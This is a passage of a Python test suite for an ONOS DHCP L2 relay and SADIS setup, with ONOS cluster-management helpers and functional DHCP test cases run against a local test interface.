cip, sip, mac, _ = self.dhcp.only_discover(multiple = True)
log_test.info('Got dhcp client IP %s from server %s for mac %s' %
(cip, sip, mac))
else:
cip, sip = self.send_recv(mac=mac, update_seed = True, validate = False)
if cip:
self.ip_count +=1
elif cip == None:
self.failure_count += 1
log_test.info('Failed to get ip')
if success_rate and self.ip_count > 0:
break
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count+self.failure_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
def send_recv(self, mac=None, update_seed = False, validate = True):
cip, sip = self.dhcp.discover(mac = mac, update_seed = update_seed)
if validate:
assert_not_equal(cip, None)
assert_not_equal(sip, None)
log_test.info('Got dhcp client IP %s from server %s for mac %s' %
(cip, sip, self.dhcp.get_mac(cip)[0]))
return cip,sip
def cliEnter(self, controller = None):
retries = 0
while retries < 30:
self.cli = OnosCliDriver(controller = controller, connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
def verify_cluster_status(self,controller = None,onos_instances=ONOS_INSTANCES,verify=False):
tries = 0
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_summary = json.loads(self.cli.summary(jsonFormat = True))
if cluster_summary:
log_test.info("cluster 'summary' command output is %s"%cluster_summary)
nodes = cluster_summary['nodes']
if verify:
if nodes == onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
if nodes >= onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
tries += 1
time.sleep(1)
self.cliExit()
return False
except:
raise Exception('Failed to get cluster members')
return False
def get_cluster_current_member_ips(self, controller = None, nodes_filter = None):
tries = 0
cluster_ips = []
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_nodes = json.loads(self.cli.nodes(jsonFormat = True))
if cluster_nodes:
log_test.info("cluster 'nodes' output is %s"%cluster_nodes)
if nodes_filter:
cluster_nodes = nodes_filter(cluster_nodes)
cluster_ips = map(lambda c: c['id'], cluster_nodes)
self.cliExit()
cluster_ips.sort(lambda i1,i2: int(i1.split('.')[-1]) - int(i2.split('.')[-1]))
return cluster_ips
else:
tries += 1
self.cliExit()
return cluster_ips
except:
raise Exception('Failed to get cluster members')
return cluster_ips
def get_cluster_container_names_ips(self,controller=None):
onos_names_ips = {}
controllers = get_controllers()
i = 0
for controller in controllers:
if i == 0:
name = Onos.NAME
else:
name = '{}-{}'.format(Onos.NAME, i+1)
onos_names_ips[controller] = name
onos_names_ips[name] = controller
i += 1
return onos_names_ips
def get_cluster_current_master_standbys(self,controller=None,device_id=relay_device_id):
master = None
standbys = []
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
log_test.info('Verifying device info in line %s'%device)
if device['id'] == device_id:
master = str(device['master'])
standbys = map(lambda d: str(d), device['standbys'])
log_test.info('Master and standbys for device %s are %s and %s'%(device_id, master, standbys))
self.cliExit()
return master, standbys
break
self.cliExit()
return master, standbys
else:
tries += 1
time.sleep(1)
self.cliExit()
return master,standbys
except:
raise Exception('Failed to get cluster members')
return master,standbys
def get_cluster_current_master_standbys_of_connected_devices(self,controller=None):
''' returns master and standbys of all the connected devices to ONOS cluster instance'''
device_dict = {}
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
device_dict = {}
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
device_dict[str(device['id'])]= {'master':str(device['master']),'standbys':device['standbys']}
for i in range(len(device_dict[device['id']]['standbys'])):
device_dict[device['id']]['standbys'][i] = str(device_dict[device['id']]['standbys'][i])
log_test.info('master and standbys for device %s are %s and %s'%(device['id'],device_dict[device['id']]['master'],device_dict[device['id']]['standbys']))
self.cliExit()
return device_dict
else:
tries += 1
time.sleep(1)
self.cliExit()
return device_dict
except:
raise Exception('Failed to get cluster members')
return device_dict
def get_number_of_devices_of_master(self,controller=None):
'''returns master-device pairs, which master having what devices'''
master_count = {}
try:
cli = self.cliEnter(controller = controller)
masters = json.loads(self.cli.masters(jsonFormat = True))
if masters:
for master in masters:
master_count[str(master['id'])] = {'size':int(master['size']),'devices':master['devices']}
return master_count
else:
return master_count
except:
raise Exception('Failed to get cluster members')
return master_count
def change_master_current_cluster(self,new_master=None,device_id=relay_device_id,controller=None):
if new_master is None: return False
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + new_master + ' ' + 'master'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
master, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_equal(master,new_master)
log_test.info('Cluster master changed to %s successfully'%new_master)
def withdraw_cluster_current_mastership(self,master_ip=None,device_id=relay_device_id,controller=None):
'''current master looses its mastership and hence new master will be elected'''
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + master_ip + ' ' + 'none'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
new_master_ip, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_not_equal(new_master_ip,master_ip)
log_test.info('Device-role of device %s successfully changed to none for controller %s'%(device_id,master_ip))
log_test.info('Cluster new master is %s'%new_master_ip)
return True
def cluster_controller_restarts(self, graceful = False):
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
#this call would verify the cluster for once
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration, controller = None):
adjacent_controller = None
adjacent_controllers = None
if controller:
adjacent_controllers = list(set(controllers) - set([controller]))
adjacent_controller = adjacent_controllers[0]
for node in controllers:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
failed = self.verify_leaders(controllers)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return controller
try:
ips = self.get_cluster_current_member_ips(controller = adjacent_controller)
log_test.info('ONOS cluster formed with controllers: %s' %ips)
st = True
except:
st = False
failed = self.verify_leaders(controllers)
if failed:
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
if st is False:
log_test.info('No storage exception and ONOS cluster was not formed successfully')
else:
controller = None
return controller
next_controller = None
tries = self.ITERATIONS
for num in range(tries):
index = num % ctlr_len
#index = random.randrange(0, ctlr_len)
controller_name = onos_map[controllers[index]] if next_controller is None else onos_map[next_controller]
controller = onos_map[controller_name]
log_test.info('ITERATION: %d. Restarting Controller %s' %(num + 1, controller_name))
try:
#enable debug log for the other controllers before restarting this controller
adjacent_controllers = list( set(controllers) - set([controller]) )
self.log_set(controllers = adjacent_controllers)
self.log_set(app = 'io.atomix', controllers = adjacent_controllers)
if graceful is True:
log_test.info('Gracefully shutting down controller: %s' %controller)
self.onos_shutdown(controller)
cord_test_onos_restart(node = controller, timeout = 0)
self.log_set(controllers = controller)
self.log_set(app = 'io.atomix', controllers = controller)
time.sleep(60)
except:
time.sleep(5)
continue
#first archive the test case logs for this run
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
next_controller = check_exception(num, controller = controller)
def onos_shutdown(self, controller = None):
status = True
self.cliEnter(controller = controller)
try:
self.cli.shutdown(timeout = 10)
except:
log_test.info('Graceful shutdown of ONOS failed for controller: %s' %controller)
status = False
self.cliExit()
return status
def test_dhcpl2relay_initialize(self):
'''Configure the DHCP L2 relay app and start dhcpd'''
self.dhcpd_start()
def test_dhcpl2relay_with_one_request(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
self.send_recv(mac=mac)
def test_dhcpl2relay_app_install(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.dhcpl2relay'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
app_status = True
if app_status is not True:
log_test.info('%s app is not being installed'%app_name)
assert_equal(True, app_status)
def test_dhcpl2relay_sadis_app_install(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
app_status = True
if app_status is not True:
log_test.info('%s app is not being installed'%app_name)
assert_equal(True, app_status)
def test_dhcpl2relay_netcfg(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.dhcpl2relay'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
else:
log_test.info('The network configuration is shown = %s'%onos_netcfg['apps'][app_name])
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown'%app_name)
assert_equal(True, False)
def test_dhcpl2relay_sadis_netcfg(self, iface = 'veth0'):
mac = self.get_mac(iface)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
else:
log_test.info('The network configuration is shown = %s'%(onos_netcfg['apps'][app_name]))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown'%app_name)
assert_equal(True, False)
def test_dhcpl2relay_with_array_of_connect_points_for_dhcp_server(self, iface = 'veth0'):
connect_point = self.default_onos_netcfg['apps']['org.opencord.dhcpl2relay']['dhcpl2relay']['dhcpServerConnectPoints']
log_test.info('Existing connect point of dhcp server is %s'%connect_point)
relay_device_map1 = '{}/{}'.format(self.relay_device_id, random.randrange(1,5, 1))
relay_device_map2 = '{}/{}'.format(self.relay_device_id, random.randrange(6,10, 1))
relay_device_map3 = '{}/{}'.format(self.relay_device_id, random.randrange(10,16, 1))
relay_device_map4 = '{}/{}'.format(self.relay_device_id, random.randrange(17,23, 1))
dhcp_server_array_connectPoints = [connect_point[0],relay_device_map1,relay_device_map2,relay_device_map3,relay_device_map4]
log_test.info('Added array of connect points of dhcp server is %s'%dhcp_server_array_connectPoints)
mac = self.get_mac(iface)
self.onos_load_config(self.default_onos_netcfg)
dhcp_dict = { "apps" : { "org.opencord.dhcpl2relay" : {"dhcpl2relay" :
{"dhcpServerConnectPoints": dhcp_server_array_connectPoints}
}
}
}
self.onos_load_config(dhcp_dict)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.dhcpl2relay'
for app in onos_netcfg['apps']:
if app == app_name and onos_netcfg['apps'][app] != {}:
log_test.info('%s app is being installed'%app)
log_test.info('The network configuration is shown %s'%onos_netcfg['apps'][app])
x = set(onos_netcfg['apps'][app_name]['dhcpl2relay']['dhcpServerConnectPoints']) & set(dhcp_server_array_connectPoints)
if len(x) == len(dhcp_server_array_connectPoints):
log_test.info('The loaded onos network configuration is = %s'%dhcp_server_array_connectPoints)
app_status = True
break
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown'%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
self.send_recv(mac=mac)
def test_dhcpl2relay_with_subscriber_configured_with_ctag_stag_as_per_sadis(self, iface = 'veth0'):
mac = self.get_mac(iface)
c_tag = 600
invalid_sadis_info = self.sadis_info_dict(c_tag = 600,s_tag = 500)
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag'] == c_tag:
log_test.info('The S Tag and C Tag info from network configuration are %s and %s respectively '%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['sTag'],onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_app_activation_and_deactivation_multiple_times(self, iface = 'veth0'):
iterations = 15
for i in range(iterations):
self.onos_ctrl.deactivate()
time.sleep(3)
self.onos_ctrl.activate()
log_test.info('Dhcpl2relay app is activated and deactivated multiple times around %s, now sending DHCP discover'%iterations)
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
self.send_recv(mac=mac)
def test_dhcpl2relay_without_sadis_app(self, iface = 'veth0'):
mac = self.get_mac(iface)
OnosCtrl.uninstall_app(self.sadis_app_file)
OnosCtrl(self.sadis_app).deactivate()
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_delete_and_add_sadis_app(self, iface = 'veth0'):
mac = self.get_mac(iface)
log_test.info('Uninstall the sadis app from onos ,app version = %s '%self.sadis_app_file)
OnosCtrl.uninstall_app(self.sadis_app_file)
OnosCtrl(self.sadis_app).deactivate()
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
log_test.info('Installing the sadis app in onos again, app version = %s '%self.sadis_app_file)
OnosCtrl.install_app(self.sadis_app_file)
OnosCtrl(self.sadis_app).activate()
OnosCtrl(self.app).activate()
#self.onos_load_config(self.sadis_configs['relay_config'])
self.send_recv(mac=mac)
def test_dhcpl2relay_with_option_82(self, iface = 'veth0'):
pass
def test_dhcpl2relay_without_option_82(self, iface = 'veth0'):
pass
def test_dhcl2relay_for_option82_without_configuring_dhcpserver_to_accept_option82(self, iface = 'veth0'):
pass
def test_dhcpl2relay_with_different_uni_port_entry_sadis_config(self, iface = 'veth0'):
mac = self.get_mac(iface)
subscriber_port_id = "uni-200"
invalid_sadis_info = self.sadis_info_dict(subscriber_port_id = "uni-200")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['id'] == subscriber_port_id:
log_test.info('The network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['id']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_different_ctag_options(self, iface = 'veth0'):
mac = self.get_mac(iface)
c_tag = 600
invalid_sadis_info = self.sadis_info_dict(c_tag = 600)
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag'] == c_tag:
log_test.info('The C Tag info from network configuration is = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['cTag']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_different_stag_options(self, iface = 'veth0'):
mac = self.get_mac(iface)
s_tag = 600
invalid_sadis_info = self.sadis_info_dict(s_tag = 600)
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['sTag'] == s_tag:
log_test.info('The S Tag info from the network configuration is = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['sTag']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_without_nasportid_option_in_sadis(self, iface = 'veth0'):
mac = self.get_mac(iface)
invalid_sadis_info = self.sadis_info_dict(nas_port_id = " ")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId'] == " ":
log_test.info('The nasPortId info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_nasportid_different_from_id(self, iface = 'veth0'):
mac = self.get_mac(iface)
nas_port_id = "uni-509"
invalid_sadis_info = self.sadis_info_dict(nas_port_id = "uni-509")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId'] == nas_port_id:
log_test.info('The nasPortId info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][0]['nasPortId']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_without_serial_id_of_olt(self, iface = 'veth0'):
mac = self.get_mac(iface)
invalid_sadis_info = self.sadis_info_dict(olt_serial_id = " ")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id'] == " ":
log_test.info('The serial Id info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id']))
app_status = True
if app_status is not True:
log_test.info('%s app is not installed or network configuration is not shown '%app_name)
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_with_wrong_serial_id_of_olt(self, iface = 'veth0'):
mac = self.get_mac(iface)
olt_serial_id = "07f20d06696041febf974ccdhdhhjh37"
invalid_sadis_info = self.sadis_info_dict(olt_serial_id = "07f20d06696041febf974ccdhdhhjh37")
self.cord_sadis_load(sadis_info = invalid_sadis_info)
onos_netcfg = OnosCtrl.get_config()
app_status = False
app_name = 'org.opencord.sadis'
for app in onos_netcfg['apps']:
if app == app_name:
log_test.info('%s app is being installed'%app)
if onos_netcfg['apps'][app_name] == {}:
log_test.info('The network configuration is not shown'%onos_netcfg['apps'][app_name])
elif onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id'] == olt_serial_id:
log_test.info('The serial Id info from network configuration is shown = %s'%(onos_netcfg['apps'][app_name]['sadis']['entries'][1]['id']))
app_status = True
if app_status is not True:
assert_equal(True, False)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(cip,None)
def test_dhcpl2relay_for_one_request_with_invalid_source_mac_broadcast(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac='ff:ff:ff:ff:ff:ff')
assert_equal(cip,None)
log_test.info('Dhcp server rejected client discover with invalid source mac, as expected')
def test_dhcpl2relay_for_one_request_with_invalid_source_mac_multicast(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac='01:80:c2:01:98:05')
assert_equal(cip,None)
log_test.info('Dhcp server rejected client discover with invalid source mac, as expected')
def test_dhcpl2relay_for_one_request_with_invalid_source_mac_zero(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac='00:00:00:00:00:00')
assert_equal(cip,None)
log_test.info('dhcp server rejected client discover with invalid source mac, as expected')
### We can't test this on single uni port setup, hence its not to test
@nottest
def test_dhcpl2relay_with_N_requests(self, iface = 'veth0',requests=10):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
ip_map = {}
for i in range(requests):
#mac = RandMAC()._fix()
#log_test.info('mac is %s'%mac)
cip, sip = self.send_recv(mac=mac, update_seed = True)
if ip_map.has_key(cip):
log_test.info('IP %s given out multiple times' %cip)
assert_equal(False, ip_map.has_key(cip))
ip_map[cip] = sip
time.sleep(1)
def test_dhcpl2relay_with_one_release(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.100.10', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
@nottest
def test_dhcpl2relay_with_Nreleases(self, iface = 'veth0'):
mac = None
self.dhcp = DHCPTest(seed_ip = '192.170.1.10', iface = iface)
ip_map = {}
for i in range(10):
cip, sip = self.send_recv(mac=mac, update_seed = True)
if ip_map.has_key(cip):
log_test.info('IP %s given out multiple times' %cip)
assert_equal(False, ip_map.has_key(cip))
ip_map[cip] = sip
for ip in ip_map.keys():
log_test.info('Releasing IP %s' %ip)
assert_equal(self.dhcp.release(ip), True)
ip_map2 = {}
log_test.info('Triggering DHCP discover again after release')
self.dhcp = DHCPTest(seed_ip = '192.170.1.10', iface = iface)
for i in range(len(ip_map.keys())):
cip, sip = self.send_recv(mac=mac, update_seed = True)
ip_map2[cip] = sip
log_test.info('Verifying released IPs were given back on rediscover')
if ip_map != ip_map2:
log_test.info('Map before release %s' %ip_map)
log_test.info('Map after release %s' %ip_map2)
assert_equal(ip_map, ip_map2)
@nottest
def test_dhcpl2relay_starvation(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '182.17.0.1', iface = iface)
log_test.info('Verifying 1 ')
count = 0
while True:
#mac = RandMAC()._fix()
cip, sip = self.send_recv(mac=mac,update_seed = True,validate = False)
if cip is None:
break
else:
count += 1
assert_equal(count,91)
log_test.info('Verifying 2 ')
cip, sip = self.send_recv(mac=mac, update_seed = True, validate = False)
assert_equal(cip, None)
assert_equal(sip, None)
def test_dhcpl2relay_with_same_client_and_multiple_discovers(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s . Not going to send DHCPREQUEST.' %
(cip, sip, mac) )
assert_not_equal(cip, None)
log_test.info('Triggering DHCP discover again.')
new_cip, new_sip, new_mac, _ = self.dhcp.only_discover(mac=mac)
assert_equal(new_cip, cip)
log_test.info('got same ip to smae the client when sent discover again, as expected')
def test_dhcpl2relay_with_same_client_and_multiple_requests(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
log_test.info('Sending DHCP discover and DHCP request.')
cip, sip = self.send_recv(mac=mac)
mac = self.dhcp.get_mac(cip)[0]
log_test.info("Sending DHCP request again.")
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info('got same ip to smae the client when sent request again, as expected')
def test_dhcpl2relay_with_clients_desired_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '192.168.1.31', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac,desired = True)
assert_equal(cip,self.dhcp.seed_ip)
log_test.info('Got dhcp client desired IP %s from server %s for mac %s as expected' %
(cip, sip, mac) )
def test_dhcpl2relay_with_clients_desired_address_out_of_pool(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.35', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac,desired = True)
assert_not_equal(cip,None)
assert_not_equal(cip,self.dhcp.seed_ip)
log_test.info('server offered IP from its pool when requested out of pool IP, as expected')
def test_dhcpl2relay_nak_packet(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request('20.20.20.31', mac)
assert_equal(new_cip, None)
log_test.info('server sent NAK packet when requested other IP than that server offered')
def test_dhcpl2relay_client_requests_with_specific_lease_time_in_discover_message(self, iface = 'veth0',lease_time=700):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.70', iface = iface)
self.dhcp.return_option = 'lease'
cip, sip, mac, lval = self.dhcp.only_discover(mac=mac,lease_time=True,lease_value=lease_time)
assert_equal(lval, lease_time)
log_test.info('dhcp server offered IP address with client requested lease time')
def test_dhcpl2relay_with_client_request_after_reboot(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('client rebooting...')
os.system('ifconfig '+iface+' down')
time.sleep(5)
os.system('ifconfig '+iface+' up')
new_cip2, new_sip = self.dhcp.only_request(cip, mac, cl_reboot = True)
assert_equal(new_cip2, cip)
log_test.info('client got same IP after reboot, as expected')
def test_dhcpl2relay_after_server_shutting_down(self, iface = 'veth0'):
self.get_dhcpd_process()
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('server rebooting...')
try:
if self.dhcpd_stop(remote_controller = True, dhcpd = 'stop'):
time.sleep(5)
log_test.info('DHCP server is stopped ')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip,None)
else:
